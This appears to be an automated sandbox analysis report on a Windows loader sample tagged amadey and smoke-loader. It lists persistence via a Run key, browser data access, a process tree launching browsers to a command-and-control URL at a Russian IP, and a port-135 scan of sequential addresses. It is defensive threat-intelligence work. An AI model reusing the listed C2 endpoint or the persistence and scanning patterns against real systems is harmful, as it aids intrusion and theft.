Analysis Overview
SHA256
123d28c8739c51bc1fb2829176f21bd72ef8112f168b85223855ff73aa5b80ff
Threat Level: Likely malicious
The file 2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader was found to be: Likely malicious.
Malicious Activity Summary
Contacts a large (1018) amount of remote hosts
Contacts a large (896) amount of remote hosts
Reads user/profile data of web browsers
Adds Run key to start application
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
System Location Discovery: System Language Discovery
Unsigned PE
Browser Information Discovery
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Analysis: static1
Detonation Overview
Reported
2025-07-04 12:07
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2025-07-04 12:07
Reported
2025-07-04 12:09
Platform
win11-20250502-en
Max time kernel
149s
Max time network
150s
Signatures
Contacts a large (896) amount of remote hosts
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ati display driver = "ÔN@" | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Browser Information Discovery
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133961044410459447" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3518521428-3897247806-4080064211-1000\{06510F15-9D65-45BF-ACCA-7125EFA07FDB} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe
"C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe"
C:\Program Files\Internet Explorer\IEXPLORE.exe
"C:\Program Files\Internet Explorer\IEXPLORE" 212.33.237.86/images/1/report.php
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -- "http://212.33.237.86/images/1/report.php"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x36c,0x7ffbbd47f208,0x7ffbbd47f214,0x7ffbbd47f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2108,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=2104 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1772,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=2188 /prefetch:11
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2372,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=2544 /prefetch:13
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3348,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=3388 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3372,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=3448 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4088,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4076,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=4172 /prefetch:9
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4124,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=4312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=3324,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=4316 /prefetch:9
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3588,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=3384 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5272,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=5284 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2420,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=5568 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3616,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=5584 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5200,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=5228 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5200,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=5228 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5408,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6024 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
cookie_exporter.exe --cookie-json=1144
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6168,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6236 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6208,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6356 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6520,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6456 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6492,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6240 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6248,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6768 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6236,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6476 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7156,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=7224 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7412,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=7256 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=5244,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=4336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=3420,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4496,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=3392 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5048,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=5464 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4900,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6864 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=5824,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4656,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=3532 /prefetch:14
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ÔN@
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4424,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=3568 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=868,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=4148 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=3568,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=4408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4400,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6540 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5132,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=5128 /prefetch:10
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6104,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=5188 /prefetch:14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| RU | 212.33.237.86:80 | | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| RU | 212.33.237.86:80 | | tcp |
| US | 150.171.28.11:80 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| GB | 216.58.212.238:443 | clients2.google.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| RU | 212.33.237.86:443 | | tcp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| GB | 2.18.27.92:443 | copilot.microsoft.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| RU | 212.33.237.86:443 | | tcp |
| US | 8.8.8.8:53 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | udp |
| GB | 2.20.12.74:443 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | tcp |
| RU | 212.33.237.86:443 | | tcp |
| GB | 2.18.27.89:443 | www.bing.com | tcp |
| RU | 212.33.237.86:443 | | tcp |
| RU | 212.33.237.86:80 | | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| RU | 212.33.237.86:80 | | tcp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| GB | 2.18.27.89:443 | www.bing.com | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| RU | 212.33.237.86:80 | | tcp |
| RU | 212.33.237.86:80 | | tcp |
| RU | 212.33.237.86:80 | | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| RU | 212.33.237.86:80 | | tcp |
| RU | 212.33.237.86:80 | | tcp |
| RU | 212.33.237.86:80 | | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| GB | 2.18.27.95:443 | www.bing.com | udp |
| US | 199.232.214.172:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| RU | 212.33.237.86:80 | tcp | |
| RU | 212.33.237.86:80 | tcp | |
| RU | 212.33.237.86:80 | tcp | |
| US | 209.76.61.125:135 | tcp | |
| US | 209.76.61.126:135 | tcp | |
| US | 209.76.61.127:135 | tcp | |
| US | 209.76.61.128:135 | tcp | |
| US | 209.76.61.129:135 | tcp | |
| US | 209.76.61.130:135 | tcp | |
| US | 209.76.61.131:135 | tcp | |
| US | 209.76.61.132:135 | tcp | |
| US | 209.76.61.133:135 | tcp | |
| US | 209.76.61.134:135 | tcp | |
| US | 209.76.61.135:135 | tcp | |
| US | 209.76.61.136:135 | tcp | |
| US | 209.76.61.137:135 | tcp | |
| US | 209.76.61.138:135 | tcp | |
| US | 209.76.61.139:135 | tcp | |
| US | 209.76.61.140:135 | tcp | |
| US | 209.76.61.141:135 | tcp | |
| US | 209.76.61.142:135 | tcp | |
| US | 209.76.61.143:135 | tcp | |
| US | 209.76.61.144:135 | tcp | |
| US | 209.76.61.145:135 | tcp | |
| US | 209.76.61.146:135 | tcp | |
| US | 209.76.61.147:135 | tcp | |
| US | 209.76.61.148:135 | tcp | |
| US | 209.76.61.149:135 | tcp | |
| US | 209.76.61.150:135 | tcp | |
| US | 209.76.61.151:135 | tcp | |
| US | 209.76.61.152:135 | tcp | |
| US | 209.76.61.153:135 | tcp | |
| US | 209.76.61.154:135 | tcp | |
| US | 209.76.61.155:135 | tcp | |
| US | 209.76.61.156:135 | tcp | |
| US | 209.76.61.157:135 | tcp | |
| US | 209.76.61.158:135 | tcp | |
| US | 209.76.61.159:135 | tcp | |
| US | 209.76.61.160:135 | tcp | |
| US | 209.76.61.161:135 | tcp | |
| US | 209.76.61.162:135 | tcp | |
| US | 209.76.61.163:135 | tcp | |
| US | 209.76.61.164:135 | tcp | |
| US | 209.76.61.165:135 | tcp | |
| US | 209.76.61.166:135 | tcp | |
| US | 209.76.61.167:135 | tcp | |
| US | 209.76.61.168:135 | tcp | |
| US | 209.76.61.169:135 | tcp | |
| US | 209.76.61.170:135 | tcp | |
| US | 209.76.61.171:135 | tcp | |
| US | 209.76.61.172:135 | tcp | |
| US | 209.76.61.173:135 | tcp | |
| US | 209.76.61.174:135 | tcp | |
| US | 209.76.61.175:135 | tcp | |
| US | 209.76.61.176:135 | tcp | |
| US | 209.76.61.177:135 | tcp | |
| US | 209.76.61.178:135 | tcp | |
| US | 209.76.61.179:135 | tcp | |
| US | 209.76.61.180:135 | tcp | |
| US | 209.76.61.181:135 | tcp | |
| US | 209.76.61.182:135 | tcp | |
| US | 209.76.61.183:135 | tcp | |
| US | 209.76.61.184:135 | tcp | |
| US | 209.76.61.185:135 | tcp | |
| US | 209.76.61.186:135 | tcp | |
| US | 209.76.61.187:135 | tcp | |
| US | 209.76.61.188:135 | tcp | |
| US | 209.76.61.189:135 | tcp | |
| US | 209.76.61.190:135 | tcp | |
| US | 209.76.61.191:135 | tcp | |
| US | 209.76.61.192:135 | tcp | |
| US | 209.76.61.193:135 | tcp | |
| US | 209.76.61.194:135 | tcp | |
| US | 209.76.61.195:135 | tcp | |
